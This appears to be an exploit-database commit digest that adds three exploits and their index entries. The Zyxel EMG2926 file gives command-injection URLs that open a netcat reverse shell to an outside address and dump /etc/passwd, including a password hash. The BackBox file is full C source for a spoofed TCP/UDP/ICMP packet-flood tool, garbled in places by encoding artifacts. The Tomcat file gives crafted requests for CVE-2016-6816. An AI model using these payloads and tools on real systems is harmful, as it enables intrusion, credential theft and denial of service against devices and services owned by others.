DB: 2017-04-04

3 new exploits

BackBox OS - Denial of Service

Apache Tomcat 6/7/8/9 - Information Disclosure

Zyxel_ EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection

files.csv

@@ -5431,6 +5431,7 @@ id,file,description,date,author,platform,type,port
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
+41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@@ -10939,6 +10940,7 @@ id,file,description,date,author,platform,type,port
 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,remote,0
 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0
+41783,platforms/multiple/remote/41783.txt,"Apache Tomcat 6/7/8/9 - Information Disclosure",2017-04-04,justpentest,multiple,remote,0
 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0
 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80
 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80
@@ -24741,6 +24743,7 @@ id,file,description,date,author,platform,type,port
 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0
 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps,0
 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution (Metasploit)",2010-10-18,Metasploit,php,webapps,0
+41782,platforms/hardware/webapps/41782.txt,"Zyxel_ EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection",2017-04-02,"trevor Hough",hardware,webapps,0
 16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
 16882,platforms/php/webapps/16882.rb,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0
 16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)",2010-07-25,Metasploit,php,webapps,0

platforms/hardware/webapps/41782.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
+# Date: 2017-04-02
+# Exploit Author: Fluffy Huffy (trevor Hough)
+# Vendor Homepage: www.zyxel.com
+# Version: EMG2926 - V1.00(AAQT.4)b8
+# Tested on: linux
+# CVE : CVE-2017-6884
+
+OS command injection vulnerability was discovered in a commonly used
+home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools
+specify the nslookup function. A malicious user may exploit numerous
+vectors to execute arbitrary commands on the router.
+
+Exploit (Reverse Shell)
+https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&
+ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p
+
+Exploit (Dump Password File)
+Request
+GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1
+Host: 192.168.0.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup
+Accept-Language: en-US,en;q=0.8
+Cookie: csd=9; sysauth=<Clipped>
+Connection: close
+
+Response (Clipped)
+<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash
+daemon:*:1:1:daemon:/var:/bin/false
+ftp:*:55:55:ftp:/home/ftp:/bin/false
+network:*:101:101:network:/var:/bin/false
+nobody:*:65534:65534:nobody:/var:/bin/false
+supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash
+admin:$1$<Clipped>:0:0:admin:/:/bin/fail

platforms/linux/dos/41781.c

@@ -0,0 +1,375 @@
+//Exploited By Hosein Askari
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <sys/types.h>
+#ifdef F_PASS
+#include <sys/stat.h>
+#endif
+#include <netinet/in_systm.h>
+#include <sys/socket.h>
+#include <string.h>
+#include <time.h>
+#ifndef __USE_BSD
+# define __USE_BSD
+#endif
+#ifndef __FAVOR_BSD
+# define __FAVOR_BSD
+#endif
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netinet/udp.h>
+#include <netinet/ip_icmp.h>
+#include <arpa/inet.h>
+#ifdef LINUX
+# define FIX(x) htons(x)
+#else
+# define FIX(x) (x)
+#endif
+#define TCP_ACK 1
+#define TCP_FIN 2
+#define TCP_SYN 4
+#define TCP_RST 8
+#define UDP_CFF 16
+#define ICMP_ECHO_G 32
+#define TCP_NOF 64
+#define TCP_URG 128
+#define TH_NOF 0x0
+#define TCP_ATTACK() (a_flags & TCP_ACK ||\
+a_flags & TCP_FIN ||\
+a_flags & TCP_SYN ||\
+a_flags & TCP_RST ||\
+a_flags & TCP_NOF ||\
+a_flags & TCP_URG )
+#define UDP_ATTACK() (a_flags & UDP_CFF)
+#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
+#define CHOOSE_DST_PORT() dst_sp =3D=3D 0 ?\
+random () :\
+htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
+#define CHOOSE_SRC_PORT() src_sp =3D=3D 0 ?\
+random () :\
+htons(src_sp + (random() % (src_ep -src_sp +1)));
+#define SEND_PACKET() if (sendto(rawsock,\
+&packet,\
+(sizeof packet),\
+0,\
+(struct sockaddr *)&target,\
+sizeof target) < 0) {\
+perror("sendto");\
+exit(-1);\
+}
+#define BANNER_CKSUM 54018
+u_long lookup(const char *host);
+unsigned short in_cksum(unsigned short *addr, int len);
+static void inject_iphdr(struct ip *ip, u_char p, u_char len);
+char *class2ip(const char *class);
+static void send_tcp(u_char th_flags);
+static void send_udp(u_char garbage);
+static void send_icmp(u_char garbage);
+char *get_plain(const char *crypt_file, const char *xor_data_key);
+static void usage(const char *argv0);
+u_long dstaddr;
+u_short dst_sp, dst_ep, src_sp, src_ep;
+char *src_class, *dst_class;
+int a_flags, rawsock;
+struct sockaddr_in target;
+const char *banner =3D "Written By C0NSTANTINE";
+struct pseudo_hdr {
+u_long saddr, daddr;
+u_char mbz, ptcl;
+u_short tcpl;
+};
+struct cksum {
+struct pseudo_hdr pseudo;
+struct tcphdr tcp;
+};
+struct {
+int gv;
+int kv;
+void (*f)(u_char);
+} a_list[] =3D {
+{ TCP_ACK, TH_ACK, send_tcp },
+{ TCP_FIN, TH_FIN, send_tcp },
+{ TCP_SYN, TH_SYN, send_tcp },
+{ TCP_RST, TH_RST, send_tcp },
+{ TCP_NOF, TH_NOF, send_tcp },
+{ TCP_URG, TH_URG, send_tcp },
+{ UDP_CFF, 0, send_udp },
+{ ICMP_ECHO_G, ICMP_ECHO, send_icmp },
+{ 0, 0, (void *)NULL },
+};
+int
+main(int argc, char *argv[])
+{
+int n, i, on =3D 1;
+int b_link;
+#ifdef F_PASS
+struct stat sb;
+#endif
+unsigned int until;
+a_flags =3D dstaddr =3D i =3D 0;
+dst_sp =3D dst_ep =3D src_sp =3D src_ep =3D 0;
+until =3D b_link =3D -1;
+src_class =3D dst_class =3D NULL;
+while ( (n =3D getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) !=3D -1) {
+char *p;
+switch (n) {
+case 'T':
+switch (atoi(optarg)) {
+case 0: a_flags |=3D TCP_ACK; break;
+case 1: a_flags |=3D TCP_FIN; break;
+case 2: a_flags |=3D TCP_RST; break;
+case 3: a_flags |=3D TCP_SYN; break;
+
+case 4: a_flags |=3D TCP_URG; break;
+
+
+}
+break;
+case 'U':
+a_flags |=3D UDP_CFF;
+break;
+case 'I':
+a_flags |=3D ICMP_ECHO_G;
+break;
+case 'N':
+a_flags |=3D TCP_NOF;
+break;
+case 's':
+src_class =3D optarg;
+break;
+case 'h':
+dstaddr =3D lookup(optarg);
+break;
+case 'd':
+dst_class =3D optarg;
+i =3D 1;
+break;
+case 'p':
+if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
+usage(argv[0]);
+dst_sp =3D atoi(optarg);
+dst_ep =3D atoi(p +1);
+break;
+case 'q':
+if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
+usage(argv[0]);
+src_sp =3D atoi(optarg);
+src_ep =3D atoi(p +1);
+break;
+case 'l':
+b_link =3D atoi(optarg);
+if (b_link <=3D 0 || b_link > 100)
+usage(argv[0]);
+break;
+case 't':
+until =3D time(0) +atoi(optarg);
+break;
+default:
+usage(argv[0]);
+break;
+}
+}
+if ( (!dstaddr && !i) ||
+(dstaddr && i) ||
+(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
+(src_sp !=3D 0 && src_sp > src_ep) ||
+(dst_sp !=3D 0 && dst_sp > dst_ep))
+usage(argv[0]);
+srandom(time(NULL) ^ getpid());
+if ( (rawsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
+perror("socket");
+exit(-1);
+}
+if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
+(char *)&on, sizeof(on)) < 0) {
+perror("setsockopt");
+exit(-1);
+}
+target.sin_family =3D AF_INET;
+for (n =3D 0; ; ) {
+if (b_link !=3D -1 && random() % 100 +1 > b_link) {
+if (random() % 200 +1 > 199)
+usleep(1);
+continue;
+}
+for (i =3D 0; a_list[i].f !=3D NULL; ++i) {
+if (a_list[i].gv & a_flags)
+a_list[i].f(a_list[i].kv);
+}
+if (n++ =3D=3D 100) {
+if (until !=3D -1 && time(0) >=3D until) break;
+n =3D 0;
+}
+}
+exit(0);
+}
+u_long
+lookup(const char *host)
+{
+struct hostent *hp;
+
+if ( (hp =3D gethostbyname(host)) =3D=3D NULL) {
+perror("gethostbyname");
+exit(-1);
+}
+return *(u_long *)hp->h_addr;
+}
+#define RANDOM() (int) random() % 255 +1
+char *
+class2ip(const char *class)
+{
+static char ip[16];
+int i, j;
+
+for (i =3D 0, j =3D 0; class[i] !=3D '{TEXTO}'; ++i)
+if (class[i] =3D=3D '.')
+++j;
+switch (j) {
+case 0:
+sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
+break;
+case 1:
+sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
+break;
+case 2:
+sprintf(ip, "%s.%d", class, RANDOM());
+break;
+default: strncpy(ip, class, 16);
+break;
+}
+return ip;
+}
+unsigned short
+in_cksum(unsigned short *addr, int len)
+{
+int nleft =3D len;
+int sum =3D 0;
+unsigned short *w =3D addr;
+unsigned short answer =3D 0;
+while (nleft > 1) {
+sum +=3D *w++;
+nleft -=3D 2;
+}
+if (nleft =3D=3D 1) {
+*(unsigned char *) (&answer) =3D *(unsigned char *)w;
+sum +=3D answer;
+}
+sum =3D (sum >> 16) + (sum & 0xffff);
+sum +=3D (sum >> 16);
+answer =3D ~sum;
+return answer;
+}
+static void
+inject_iphdr(struct ip *ip, u_char p, u_char len)
+{
+ip->ip_hl =3D 5;
+ip->ip_v =3D 4;
+ip->ip_p =3D p;
+ip->ip_tos =3D 0x08; /* 0x08 */
+ip->ip_id =3D random();
+ip->ip_len =3D len;
+ip->ip_off =3D 0;
+ip->ip_ttl =3D 255;
+ip->ip_dst.s_addr =3D dst_class !=3D NULL ?
+inet_addr(class2ip(dst_class)) :
+dstaddr;
+ip->ip_src.s_addr =3D src_class !=3D NULL ?
+inet_addr(class2ip(src_class)) :
+random();
+target.sin_addr.s_addr =3D ip->ip_dst.s_addr;
+}
+static void
+send_tcp(u_char th_flags)
+{
+struct cksum cksum;
+struct packet {
+struct ip ip;
+struct tcphdr tcp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
+packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
+cksum.pseudo.daddr =3D dstaddr;
+cksum.pseudo.mbz =3D 0;
+cksum.pseudo.ptcl =3D IPPROTO_TCP;
+cksum.pseudo.tcpl =3D htons(sizeof(struct tcphdr));
+cksum.pseudo.saddr =3D packet.ip.ip_src.s_addr;
+packet.tcp.th_flags =3D random();
+packet.tcp.th_win =3D random();
+packet.tcp.th_seq =3D random();
+packet.tcp.th_ack =3D random();
+packet.tcp.th_off =3D 5;
+packet.tcp.th_urp =3D 0;
+packet.tcp.th_sport =3D CHOOSE_SRC_PORT();
+packet.tcp.th_dport =3D CHOOSE_DST_PORT();
+cksum.tcp =3D packet.tcp;
+packet.tcp.th_sum =3D in_cksum((void *)&cksum, sizeof(cksum));
+SEND_PACKET();
+}
+static void
+send_udp(u_char garbage)
+{
+struct packet {
+struct ip ip;
+struct udphdr udp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
+packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
+packet.udp.uh_sport =3D CHOOSE_SRC_PORT();
+packet.udp.uh_dport =3D CHOOSE_DST_PORT();
+packet.udp.uh_ulen =3D htons(sizeof packet.udp);
+packet.udp.uh_sum =3D 0;
+SEND_PACKET();
+}
+static void
+send_icmp(u_char gargabe)
+{
+struct packet {
+struct ip ip;
+struct icmp icmp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
+packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
+packet.icmp.icmp_type =3D ICMP_ECHO;
+packet.icmp.icmp_code =3D 0;
+packet.icmp.icmp_cksum =3D htons( ~(ICMP_ECHO << 8));
+for(int pp=3D0;pp<=3D1000;pp++)
+{SEND_PACKET();
+pp++;
+}
+}
+static void
+usage(const char *argv0)
+{
+printf("%s \n", banner);
+printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\=
+n");
+printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m=
+\n");
+printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0=
+m\n");
+printf(" -T TCP attack \e[1;37m[\e[0m0:ACK, 1:FIN, 2:RST, 3:SYN, 4:URG\e[1;=
+37m]\e[0m\n");
+printf(" -h destination host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;3=
+7m)\e[0m\n");
+printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[=
+0m\n");
+printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\=
+n");
+printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom=
+\e[0m\e[1;37m)\e[0m\n");
+printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m=
+\e[1;37m)\e[0m\n");
+printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n=
+");
+printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n")=
+;
+printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -U -I -h -p -t]\n", argv0)=
+;
+exit(-1);
+}

platforms/multiple/remote/41783.txt

@@ -0,0 +1,54 @@
+# Exploit Title:Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
+# Date: 4th March 2017
+# Exploit Author: justpentest
+# Vendor Homepage: tomcat.apache.org
+# Version: Apache Tomcat 9.0.0.M1 through 9.0.0.M11, 8.5.0 through 8.5.6,
+8.0.0.RC1 through 8.0.38, 7.0.0 through 7.0.72 and 6.0.0 through 6.0.47
+# Contact: transform2secure@gmail.com
+
+
+Source: http://www.securityfocus.com/bid/94461/info
+
+1) Description:
+Apache Tomcat is prone to a security-bypass vulnerability.
+An attacker can exploit this issue to bypass certain security restrictions
+and perform unauthorized actions. This may lead to further attacks.
+Apache Tomcat 9.0.0.M1 through 9.0.0.M11, 8.5.0 through 8.5.6, 8.0.0.RC1
+through 8.0.38, 7.0.0 through 7.0.72 and 6.0.0 through 6.0.47 are
+vulnerable.
+This could be exploited, in conjunction with a proxy that also permitted
+the invalid characters but with a different interpretation, to inject data
+into the HTTP response. By manipulating the HTTP response the attacker
+could poison a web-cache, perform an XSS attack and/or obtain sensitive
+information from requests other then their own.
+
+http://www.securityfocus.com/bid/94461/discuss
+2) Exploit:
+
+GET /?{{%25}}cake\=1 HTTP/1.1
+Host: justpentest.com
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
+Trident/5.0)
+Connection: close
+Cookie:
+NSC_MSN-IBNQ-VX-mcwtfswfs=ffffffff091c1daaaa525d5f4f58455e445a4a488888
+
+ OR
+
+GET
+/?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1
+HTTP/1.1
+
+Response will be Apache tomcat front page something like
+https://en.wikipedia.org/wiki/File:Apache-tomcat-frontpage-epiphany-browser.jpg
+
+3) Refrences:
+https://nvd.nist.gov/vuln/detail/CVE-2016-6816
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816
+
+4) Solution:
+As usual update ;)
+
+